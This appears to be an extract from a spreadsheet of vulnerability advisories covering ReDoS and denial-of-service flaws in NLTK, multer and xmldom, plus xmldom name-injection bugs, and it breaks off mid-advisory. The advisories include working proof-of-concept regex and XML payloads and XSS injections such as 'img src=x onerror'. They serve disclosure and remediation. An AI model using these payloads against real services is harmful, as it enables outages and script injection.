The NLTK `tgrep` module accepts user-supplied regular expressions and passes them to the Python `re` engine without a timeout or validation, enabling catastrophic backtracking (ReDoS). Applications that expose the `tgrep` API to external input are vulnerable to a single-request denial of service that blocks the Python process indefinitely.

### Affected Code
`nltk/tgrep.py` — `_tgrep_node_action()` (around line 320)

When a tgrep pattern contains a `/regex/` node, `_tgrep_node_action` compiles the embedded regex literal directly with no validation:

```python
def _tgrep_node_action(_s, _l, tokens):
    ...
    elif tokens[0].startswith("/"):
        assert tokens[0].endswith("/")
        node_lit = tokens[0][1:-1]
        return (
            lambda r: lambda n, m=None, l=None: r.search(
                _tgrep_node_literal_value(n)
            )
        )(re.compile(node_lit))  # User regex compiled and executed with no timeout
```
The compiled regex is applied against every matching tree node label via `r.search(...)`. A caller reaching this path via `tgrep_positions()` or `tgrep_compile()` controls `node_lit` entirely.

### Proof of Concept
```python
import nltk
from nltk.tgrep import tgrep_positions

# Root node label is 25 'a' characters.
# tgrep /regex/ branch calls re.compile("((a+)+)b").search("aaa...a")
# No 'b' is present — exponential backtracking occurs.
tree = nltk.Tree.fromstring("(" + "a" * 25 + " (NP (DT the)))")
tgrep_positions(r"/((a+)+)b/", [tree])   # Never returns
```

### Working Poc

The following script uses increasing values of n (the number of repeated as in the tree root label) to measure the execution time of tgrep_positions with the catastrophic regex /((a+)+)b/. On standard CPython with NLTK 3.10.2, the runtime grows exponentially, confirming the ReDoS vulnerability. For n ≥ 35, the function will hang indefinitely.

```python
import nltk
from nltk.tgrep import tgrep_positions
import time

def test_n(n):
    tree = nltk.Tree.fromstring("(" + "a" * n + " (NP (DT the)))")
    pattern = r"/((a+)+)b/"
    start = time.perf_counter()
    list(tgrep_positions(pattern, [tree]))
    return time.perf_counter() - start

if __name__ == "__main__":
    # Adjust the range if needed – these values complete quickly
    n_values = [18, 20, 22, 24, 26, 28]
    print(f"Testing n = {n_values}\n")

    times = []
    for n in n_values:
        t = test_n(n)
        times.append((n, t))
        print(f"n={n:2d} done", flush=True)

    print("\n--- Increase factors (per step in n) ---")
    factors = []
    for i in range(1, len(times)):
        prev_n, prev_t = times[i-1]
        curr_n, curr_t = times[i]
        factor = curr_t / prev_t
        factors.append((curr_n, factor))
        print(f"n={curr_n:2d} : factor = {factor:.2f}x  (vs n={prev_n})")

    avg = sum(f for _, f in factors) / len(factors)
    print(f"\nAverage factor: {avg:.2f}x")
    print("\n✅ Confirmed: exponential growth (catastrophic backtracking).")
    print("   Larger n (≥ 35) will hang indefinitely.")
```

When run, the output shows a clear exponential increase (factor &gt; 3.0 per +2 in n), proving the vulnerability.


### Impact
In environments like web APIs (Flask, FastAPI), Jupyter notebooks, or multi-tenant pipelines, an unauthenticated attacker can cause indefinite CPU saturation with a single crafted request, denying service to all other users of the process.

### Remediation
This issue remains unfixed in versions `&lt;= 3.10.2`. Maintainers are currently collaborating on a patch to wrap the regex execution in a timeout-guarded mechanism.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="T1612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="1613"><c r="A1613" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1613" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D1613" s="5" t="inlineStr" /><c r="E1613" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1613" s="5" t="inlineStr" /><c r="H1613" s="5" t="n"><v>0.002</v></c><c r="I1613" s="5" t="inlineStr" /><c r="J1613" s="5" t="inlineStr" /><c r="K1613" s="5" t="inlineStr" /><c r="L1613" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1613" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1613" s="5" t="inlineStr" /><c r="R1613" s="5" t="inlineStr" /><c r="S1613" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="T1613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="1614"><c r="A1614" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1614" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D1614" s="5" t="inlineStr" /><c r="E1614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1614" s="5" t="inlineStr" /><c r="H1614" s="5" t="n"><v>0.003</v></c><c r="I1614" s="5" t="inlineStr" /><c r="J1614" s="5" t="inlineStr" /><c r="K1614" s="5" t="inlineStr" /><c r="L1614" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1614" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1614" s="5" t="inlineStr" /><c r="R1614" s="5" t="inlineStr" /><c r="S1614" s="5" t="inlineStr"><is><t>### Impact

multer is vulnerable to a Denial of Service (DoS) via a crafted array index in multipart field names. The `append-field` dependency parses bracket notation in field names, and a large numeric index such as `items[4294967294]` forces allocation of a maximum-length sparse array. A following field with a non-numeric key on the same base then converts that array to an object by iterating its full length, which consumes CPU synchronously and leaves the process unable to handle other requests. A single HTTP request with a crafted multipart body is sufficient to exploit this, and it affects multer 1.x and 2.x.

### Patches

Users should upgrade to `2.3.0` and configure `limits.fieldArrayIndexLimit` to the minimum array index their application requires.

### Workarounds

None.</t></is></c><c r="T1614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="1615"><c r="A1615" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1615" s="5" t="inlineStr"><is><t>CVE-2026-82514</t></is></c><c r="D1615" s="5" t="inlineStr" /><c r="E1615" s="5" t="inlineStr" /><c r="F1615" s="5" t="inlineStr" /><c r="G1615" s="5" t="inlineStr" /><c r="H1615" s="5" t="inlineStr" /><c r="I1615" s="5" t="inlineStr" /><c r="J1615" s="5" t="inlineStr" /><c r="K1615" s="5" t="inlineStr" /><c r="L1615" s="5" t="inlineStr" /><c r="M1615" s="5" t="inlineStr" /><c r="N1615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1615" s="5" t="inlineStr" /><c r="R1615" s="5" t="inlineStr" /><c r="S1615" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82514</t></is></c></row><row r="1616"><c r="A1616" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1616" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D1616" s="5" t="inlineStr" /><c r="E1616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1616" s="5" t="inlineStr" /><c r="H1616" s="5" t="n"><v>0.003</v></c><c r="I1616" s="5" t="inlineStr" /><c r="J1616" s="5" t="inlineStr" /><c r="K1616" s="5" t="inlineStr" /><c r="L1616" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1616" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1616" s="5" t="inlineStr" /><c r="R1616" s="5" t="inlineStr" /><c r="S1616" s="5" t="inlineStr"><is><t>## Summary

`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.

## Details

`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.

The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:

- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).

The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.

### Root Cause

1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Demonstrating the validation gap

```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}

// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```

## Impact

Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="1617"><c r="A1617" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1617" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D1617" s="5" t="inlineStr" /><c r="E1617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1617" s="5" t="inlineStr" /><c r="H1617" s="5" t="n"><v>0.003</v></c><c r="I1617" s="5" t="inlineStr" /><c r="J1617" s="5" t="inlineStr" /><c r="K1617" s="5" t="inlineStr" /><c r="L1617" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1617" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1617" s="5" t="inlineStr" /><c r="R1617" s="5" t="inlineStr" /><c r="S1617" s="5" t="inlineStr"><is><t>## Summary

`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).

## Details

The PI production in `lib/grammar.js` compiles (flags `mu`) to:

```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```

- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261

In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.

The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:

- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879

## Affected Versions

Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.

The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)

| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):

| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.

## Fix Applied

Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).

PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:

```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```

The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t></is></c><c r="T1617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="1618"><c r="A1618" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1618" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D1618" s="5" t="inlineStr" /><c r="E1618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1618" s="5" t="inlineStr" /><c r="H1618" s="5" t="n"><v>0.003</v></c><c r="I1618" s="5" t="inlineStr" /><c r="J1618" s="5" t="inlineStr" /><c r="K1618" s="5" t="inlineStr" /><c r="L1618" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1618" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1618" s="5" t="inlineStr" /><c r="R1618" s="5" t="inlineStr" /><c r="S1618" s="5" t="inlineStr"><is><t>## Summary

`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.

An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.

## Details

`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.

The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.

### Root Cause

1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```

## Impact

Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="1619"><c r="A1619" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1619" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D1619" s="5" t="inlineStr" /><c r="E1619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1619" s="5" t="inlineStr" /><c r="H1619" s="5" t="n"><v>0.003</v></c><c r="I1619" s="5" t="inlineStr" /><c r="J1619" s="5" t="inlineStr" /><c r="K1619" s="5" t="inlineStr" /><c r="L1619" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1619" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1619" s="5" t="inlineStr" /><c r="R1619" s="5" t="inlineStr" /><c r="S1619" s="5" t="inlineStr"><is><t>## Summary

The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.

Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.

## Details

The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:

- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.

### Enabling write paths

`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:

- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.

This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
